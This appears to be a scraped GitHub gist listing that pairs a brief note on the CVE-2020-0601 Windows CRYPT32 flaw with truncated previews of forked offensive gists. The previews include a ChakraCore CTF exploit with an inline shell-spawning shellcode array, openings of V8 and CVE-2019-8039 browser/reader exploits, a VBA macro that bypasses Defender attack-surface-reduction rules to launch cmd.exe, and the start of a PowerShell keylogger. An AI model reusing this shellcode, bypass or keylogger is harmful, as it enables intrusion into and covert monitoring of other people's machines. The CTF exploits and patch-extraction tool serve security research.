CVE-2020-0601

General

Microsoft disclosed a vulnerability in their monthly Patch Tuesday referenced under CVE-2020-0601.
The vulnerability was discovered by the U.S. National Security Agency, anounced today (2020-01-14) in their press conference, followed by a blog post and an official security advisory.
The flaw is located in the "CRYPT32.DLL" file under the C:\Windows\System32\ directory.

NSA description:
NSA has discovered a critical vulnerability (CVE-2020-0601) affecting Microsoft Windows® cryptographic functionality.

raystyle / exploit.js

Created September 18, 2019 02:09 — forked from itszn/exploit.js

Trendmicro CTF ChakraCore exploit

	let sc = [106,104,72,184,47,98,105,110,47,47,47,115,80,72,137,231,104,114,105,1,1,129,52,36,1,1,1,1,49,246,86,106,8,94,72,1,230,86,72,137,230,49,210,106,59,88,15,5];

	let conva = new ArrayBuffer(8)
	let convi = new Uint32Array(conva);
	let convf = new Float64Array(conva);

	function i2f(i) {
	convi[0] = i%0x100000000;
	convi[1] = i/0x100000000;
	return convf[0];

raystyle / poc.js

Created September 18, 2019 02:07 — forked from thetlk/poc.js

realworldctf2019 accessible v8 exploit

raystyle / poc.js

Created September 18, 2019 02:07 — forked from thetlk/poc.js

realworldctf2019 accessible v8 exploit

raystyle / CVE-2019-8039.js

Created September 12, 2019 10:17 — forked from zuypt/CVE-2019-8039.js

	console.show()

	function gc() {
	for(var i = 0; i < 3; i++) {
	var z = new ArrayBuffer(10241024100)
	}
	}

	String.prototype.hex = function() {
	var r = ''

raystyle / PatchExtract125.ps1

Created May 28, 2019 02:01 — forked from moshekaplan/PatchExtract125.ps1

Patch Extract v1.25 by Greg Linares (@Laughing_Mantis)

	<#
	================
	PATCHEXTRACT.PS1
	=================
	Version 1.25 Microsoft MSU Patch Extraction and Patch Organization Utility by Greg Linares (@Laughing_Mantis)

	This Powershell script will extract a Microsoft MSU update file and then organize the output of extracted files and folders.

	Organization of the output files is based on the patch's files and will organize them based on their archicture (x86, x64, or wow64)
	as well as their content-type, ie: resource and catalog files will be moved to a JUNK subfolder and patch binaries and index files will

raystyle / ASR Rules Bypass.vba

Created May 7, 2019 08:28 — forked from infosecn1nja/ASR Rules Bypass.vba

ASR rules bypass creating child processes

	' ASR rules bypass creating child processes
	' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction
	' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office
	' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule

	Sub ASR_blocked()
	Dim WSHShell As Object
	Set WSHShell = CreateObject("Wscript.Shell")
	WSHShell.Run "cmd.exe"
	End Sub

raystyle / gist:b6a7961eeb28331637e370ae911af16d

Created April 28, 2019 03:32 — forked from dasgoll/gist:7ca1c059dd3b3fbc7277

Simple Windows Keylogger using PowerShell

	#requires -Version 2
	function Start-KeyLogger($Path="$env:temp\keylogger.txt")
	{
	# Signatures for API Calls
	$signatures = @'
	[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
	public static extern short GetAsyncKeyState(int virtualKeyCode);
	[DllImport("user32.dll", CharSet=CharSet.Auto)]
	public static extern int GetKeyboardState(byte[] keystate);
	[DllImport("user32.dll", CharSet=CharSet.Auto)]

raystyle / pwn.js

Created April 8, 2019 03:21 — forked from saelo/pwn.js

Exploit for the "roll a d8" challenge of PlaidCTF 2018

	//
	// Quick and dirty exploit for the "roll a d8" challenge of PlaidCTF 2018.
	// N-day exploit for https://chromium.googlesource.com/v8/v8/+/b5da57a06de8791693c248b7aafc734861a3785d
	//
	// Scroll down do "BEGIN EXPLOIT" to skip the utility functions.
	//
	// Copyright (c) 2018 Samuel Groß
	//

	//

raystyle / CVE-2018-17480

Created April 3, 2019 09:33

CVE-2018-17480，CVE-2018-18342,CVE-2019-5763

https://bugs.chromium.org/p/chromium/issues/detail?id=905940